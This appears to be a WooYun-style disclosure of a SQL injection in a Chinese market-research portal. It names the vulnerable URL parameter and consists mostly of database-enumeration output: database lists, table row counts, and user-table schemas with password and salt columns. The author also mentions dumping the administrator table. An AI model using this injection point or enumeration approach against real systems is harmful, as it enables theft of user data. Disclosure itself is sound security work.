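2016-04-11: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2016-05-26: The vendor has actively ignored the vulnerability; details disclosed to the public
China's No. 1 market research portal website: 30 databases affected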
http://app.3see.com/job/public/post.php?pid=2960
database management system users password hashes:
30 databases affected
available databases [30]:
[*] 3see
[*] 3seedb
[*] 3seeforum
[*] ailon
[*] air
[*] bbs
[*] bbs7vuchome
[*] blog
[*] boblog
[*] cti_fbxt
[*] discuz
[*] doosan
[*] fbxt
[*] fenghui
[*] fenghui08
[*] info
[*] information_schema
[*] kstory
[*] mysql
[*] mysql__
[*] new3see
[*] newyearwork
[*] pku_bbs
[*] pureftpd
[*] reportdata
[*] sgbbs
[*] sgblog
[*] skw_bbs
[*] skw_member
[*] space
The current database does not hold much data, only 1000+
Database: 3see
+-----------------------+---------+
| Table                 | Entries |
+-----------------------+---------+
| t_makepagelog         | 247155  |
| cms_data_comment      | 145038  |
| payreport             | 24432   |
| cms_data              | 22338   |
| cms_create_log        | 16043   |
| cojob_inbox           | 12335   |
| t_filelog             | 8966    |
| call_datasheet        | 8525    |
| myjob_edu             | 6382    |
| stat_sheet3see        | 6305    |
| myjob_oldjob          | 6298    |
| cms_data_picture      | 6271    |
| myjob_resume          | 5342    |
| freereports           | 4061    |
| g_book                | 3821    |
| myjob_item            | 3250    |
| media_datasheet       | 2890    |
| passwordtable         | 2573    |
| manufacturer_new      | 2498    |
| manufacturer          | 2192    |
| cojob_place_new       | 1798    |
| com_user              | 1348    |
| members_homepage      | 1331    |
| en_payreport          | 1210    |
| com_manufacturer      | 1117    |
| `3seecojob_coinfo`    | 1112    |
| m_company             | 1082    |
| m_user                | 1069    |
| myjob_favorite        | 968     |
| bidding               | 773     |
| manu_art              | 728     |
| com_homepages         | 715     |
| com_bidding           | 674     |
| com_book              | 662     |
| orders                | 633     |
| cms_page_module       | 603     |
| cojob_store           | 558     |
| myjob_city            | 505     |
| myjob_letter          | 489     |
| user_report           | 435     |
| userdree              | 433     |
| trainingtable         | 393     |
| t_log                 | 391     |
| manu_art_pic          | 366     |
| pv_stat               | 354     |
| myjob_search          | 346     |
| `3seemrarticle`       | 342     |
| lib_mrarticle         | 321     |
| mrconews              | 319     |
| cms_topic_data        | 318     |
| com_news              | 297     |
| cojob_place           | 256     |
| training              | 246     |
| payreport_co          | 192     |
| settlement            | 152     |
| `3seesoftsurveyother` | 141     |
| newpic                | 124     |
| company_job           | 123     |
| diaocha2009           | 115     |
| myjob_mymsg           | 113     |
| manu_friends          | 104     |
| cms_page              | 96      |
| new_hyclass           | 96      |
| cms_data_type         | 93      |
| library_datasheet     | 90      |
| manufacturer_inform   | 87      |
| cojob_deptandplace    | 84      |
| cms_structure         | 80      |
| t_menu                | 71      |
| cojob_sessions        | 65      |
| myjob_posttype        | 63      |
| inquiry               | 45      |
| p_commentary          | 45      |
| ads_aditempic         | 44      |
| cms_data_file         | 38      |
| shclass               | 36      |
| manufacturer_moban    | 34      |
| training_qy_name      | 33      |
| ads_aditem            | 32      |
| advertisement         | 30      |
| `3seehyclass`         | 29      |
| adcategory            | 29      |
| com_hyclass           | 29      |
| m_admin               | 24      |
| mrarticleclass        | 24      |
| uparticle             | 23      |
| com_uparticle         | 22      |
| myjob_black           | 20      |
| cati_literature       | 16      |
| cms_topic             | 16      |
| manufacturer_dongtai  | 16      |
| mrarticle_neikan      | 16      |
| cms_topic_comment     | 15      |
| lib_topic             | 14      |
| training_j            | 14      |
| anli_down             | 12      |
| cms_survey_item       | 12      |
| mrarticle_zazhi       | 12      |
| t_menuclass           | 12      |
| t_power               | 12      |
| trainingclass         | 12      |
| cms_nextid            | 11      |
| m_userinfo            | 11      |
| manufacturer_anli     | 11      |
| t_user                | 11      |
| bytuijian             | 10      |
| orderspayreport       | 10      |
| ads_class             | 9       |
| cms_default_module    | 8       |
| com_seccanli          | 8       |
| seccanli              | 8       |
| training_xilie        | 7       |
| com_anli              | 6       |
| com_dongtai           | 6       |
| cms_topic_group_type  | 5       |
| cati_downloads        | 4       |
| cati_softintro        | 4       |
| cati_trends           | 3       |
| cms_survey_main       | 3       |
| cms_survey_position   | 3       |
| manu_floatad          | 3       |
| manufacturer_mbclass  | 2       |
| cms_topic_group       | 1       |
| tex                   | 1       |
| wytad_count           | 1       |
+-----------------------+---------+
Let's just dump the entire administrator table
Let's look at the other databases
Database: 3seedb
[122 tables]
+-------------------------+
| cdb_access              |
| cdb_activities          |
| cdb_activityapplies     |
| cdb_adminactions        |
| cdb_admincustom         |
| cdb_admingroups         |
| cdb_adminnotes          |
| cdb_adminsessions       |
| cdb_advcaches           |
| cdb_advertisements      |
| cdb_announcements       |
| cdb_attachments         |
| cdb_attachpaymentlog    |
| cdb_attachtypes         |
| cdb_banned              |
| cdb_bbcodes             |
| cdb_caches              |
| cdb_campaigns           |
| cdb_creditslog          |
| cdb_crons               |
| cdb_debateposts         |
| cdb_debates             |
| cdb_failedlogins        |
| cdb_faqs                |
| cdb_favorites           |
| cdb_forumfields         |
| cdb_forumlinks          |
| cdb_forumrecommend      |
| cdb_forums              |
| cdb_imagetypes          |
| cdb_invites             |
| cdb_itempool            |
| cdb_linkheader          |
| cdb_magiclog            |
| cdb_magicmarket         |
| cdb_magics              |
| cdb_medallog            |
| cdb_medals              |
| cdb_memberfields        |
| cdb_membermagics        |
| cdb_members             |
| cdb_memberspaces        |
| cdb_moderators          |
| cdb_modworks            |
| cdb_myposts             |
| cdb_mytasks             |
| cdb_mythreads           |
| cdb_navs                |
| cdb_onlinelist          |
| cdb_onlinetime          |
| cdb_orders              |
| cdb_paymentlog          |
| cdb_pluginhooks         |
| cdb_plugins             |
| cdb_pluginvars          |
| cdb_polloptions         |
| cdb_polls               |
| cdb_posts               |
| cdb_profilefields       |
| cdb_projects            |
| cdb_promotions          |
| cdb_ranks               |
| cdb_ratelog             |
| cdb_regips              |
| cdb_relatedthreads      |
| cdb_reportlog           |
| cdb_request             |
| cdb_rewardlog           |
| cdb_rsscaches           |
| cdb_searchindex         |
| cdb_sessions            |
| cdb_settings            |
| cdb_smilies             |
| cdb_spacecaches         |
| cdb_stats               |
| cdb_statvars            |
| cdb_styles              |
| cdb_stylevars           |
| cdb_subscriptions       |
| cdb_tags                |
| cdb_tasks               |
| cdb_taskvars            |
| cdb_templates           |
| cdb_threads             |
| cdb_threadsmod          |
| cdb_threadtags          |
| cdb_threadtypes         |
| cdb_tradecomments       |
| cdb_tradelog            |
| cdb_tradeoptionvars     |
| cdb_trades              |
| cdb_typemodels          |
| cdb_typeoptions         |
| cdb_typeoptionvars      |
| cdb_typevars            |
| cdb_uc_admins           |
| cdb_uc_applications     |
| cdb_uc_badwords         |
| cdb_uc_domains          |
| cdb_uc_failedlogins     |
| cdb_uc_feeds            |
| cdb_uc_friends          |
| cdb_uc_mailqueue        |
| cdb_uc_memberfields     |
| cdb_uc_members          |
| cdb_uc_mergemembers     |
| cdb_uc_newpm            |
| cdb_uc_notelist         |
| cdb_uc_pms              |
| cdb_uc_protectedmembers |
| cdb_uc_settings         |
| cdb_uc_sqlcache         |
| cdb_uc_tags             |
| cdb_uc_vars             |
| cdb_usergroups          |
| cdb_validating          |
| cdb_videos              |
| cdb_videotags           |
| cdb_virtualforums       |
| cdb_warnings            |
| cdb_words               |
| textt                   |
+-------------------------+
390,000+ user records
Database: 3seedb
Table: cdb_uc_members
[12 columns]
+---------------+-----------------------+
| Column        | Type                  |
+---------------+-----------------------+
| email         | char(32)              |
| lastloginip   | int(10)               |
| lastlogintime | int(10) unsigned      |
| myid          | char(30)              |
| myidkey       | char(16)              |
| password      | char(32)              |
| regdate       | int(10) unsigned      |
| regip         | char(15)              |
| salt          | char(6)               |
| secques       | char(8)               |
| uid           | mediumint(8) unsigned |
| username      | char(15)              |
+---------------+-----------------------+

Database: 3seedb
Table: cdb_members
[48 columns]
+---------------+-----------------------+
| Column        | Type                  |
+---------------+-----------------------+
| accessmasks   | tinyint(1)            |
| adminid       | tinyint(1)            |
| avatarshowid  | int(10) unsigned      |
| bday          | date                  |
| credits       | int(10)               |
| customaddfeed | tinyint(1)            |
| customshow    | tinyint(1) unsigned   |
| dateformat    | tinyint(1)            |
| digestposts   | smallint(6) unsigned  |
| editormode    | tinyint(1) unsigned   |
| email         | char(40)              |
| extcredits1   | int(10)               |
| extcredits2   | int(10)               |
| extcredits3   | int(10)               |
| extcredits4   | int(10)               |
| extcredits5   | int(10)               |
| extcredits6   | int(10)               |
| extcredits7   | int(10)               |
| extcredits8   | int(10)               |
| extgroupids   | char(20)              |
| gender        | tinyint(1)            |
| groupexpiry   | int(10) unsigned      |
| groupid       | smallint(6) unsigned  |
| invisible     | tinyint(1)            |
| lastactivity  | int(10) unsigned      |
| lastip        | char(15)              |
| lastpost      | int(10) unsigned      |
| lastvisit     | int(10) unsigned      |
| newsletter    | tinyint(1)            |
| oltime        | smallint(6) unsigned  |
| pageviews     | mediumint(8) unsigned |
| password      | char(32)              |
| pmsound       | tinyint(1)            |
| posts         | mediumint(8) unsigned |
| ppp           | tinyint(3) unsigned   |
| prompt        | tinyint(1)            |
| regdate       | int(10) unsigned      |
| regip         | char(15)              |
| secques       | char(8)               |
| showemail     | tinyint(1)            |
| sigstatus     | tinyint(1)            |
| styleid       | smallint(6) unsigned  |
| timeformat    | tinyint(1)            |
| timeoffset    | char(4)               |
| tpp           | tinyint(3) unsigned   |
| uid           | mediumint(8) unsigned |
| username      | char(15)              |
| xspacestatus  | tinyint(1)            |
+---------------+-----------------------+
Database: discuz
[53 tables]
+--------------------+
| cdb_access         |
| cdb_adminactions   |
| cdb_admingroups    |
| cdb_adminnotes     |
| cdb_adminsessions  |
| cdb_advertisements |
| cdb_announcements  |
| cdb_attachments    |
| cdb_attachtypes    |
| cdb_banned         |
| cdb_bbcodes        |
| cdb_blogcaches     |
| cdb_buddys         |
| cdb_creditslog     |
| cdb_failedlogins   |
| cdb_favorites      |
| cdb_forumfields    |
| cdb_forumlinks     |
| cdb_forums         |
| cdb_medals         |
| cdb_memberfields   |
| cdb_members        |
| cdb_moderators     |
| cdb_onlinelist     |
| cdb_onlinetime     |
| cdb_orders         |
| cdb_paymentlog     |
| cdb_plugins        |
| cdb_pluginvars     |
| cdb_pms            |
| cdb_polls          |
| cdb_posts          |
| cdb_profilefields  |
| cdb_ranks          |
| cdb_ratelog        |
| cdb_regips         |
| cdb_rsscaches      |
| cdb_searchindex    |
| cdb_sessions       |
| cdb_settings       |
| cdb_smilies        |
| cdb_stats          |
| cdb_statvars       |
| cdb_styles         |
| cdb_stylevars      |
| cdb_subscriptions  |
| cdb_templates      |
| cdb_threads        |
| cdb_threadsmod     |
| cdb_threadtypes    |
| cdb_usergroups     |
| cdb_validating     |
| cdb_words          |
+--------------------+
90,000+ user records
Database: bbs
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| cdb_posts        | 8084    |
| cdb_threads      | 7461    |
| cdb_spacecaches  | 2708    |
| cdb_memberfields | 543     |
| cdb_members      | 543     |
| cdb_memberspaces | 542     |
| cdb_rsscaches    | 461     |
| cdb_myposts      | 258     |
| cdb_settings     | 221     |
| cdb_mythreads    | 126     |
| cdb_statvars     | 75      |
| cdb_stylevars    | 52      |
| cdb_stats        | 50      |
| cdb_faqs         | 34      |
| cdb_forumfields  | 30      |
| cdb_forums       | 29      |
| cdb_smilies      | 29      |
| cdb_usergroups   | 16      |
| cdb_crons        | 13      |
| cdb_magics       | 12      |
| cdb_projects     | 11      |
| cdb_medals       | 10      |
| cdb_bbcodes      | 7       |
| cdb_onlinetime   | 7       |
| cdb_ranks        | 5       |
| cdb_onlinelist   | 4       |
| cdb_admingroups  | 3       |
| cdb_failedlogins | 1       |
| cdb_forumlinks   | 1       |
| cdb_styles       | 1       |
| cdb_templates    | 1       |
+------------------+---------+
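There is some user information here as well
Added together it should come to about 500,000
Could not contact the vendor, or the vendor actively refused
Vulnerability Rank: 15 (WooYun rating)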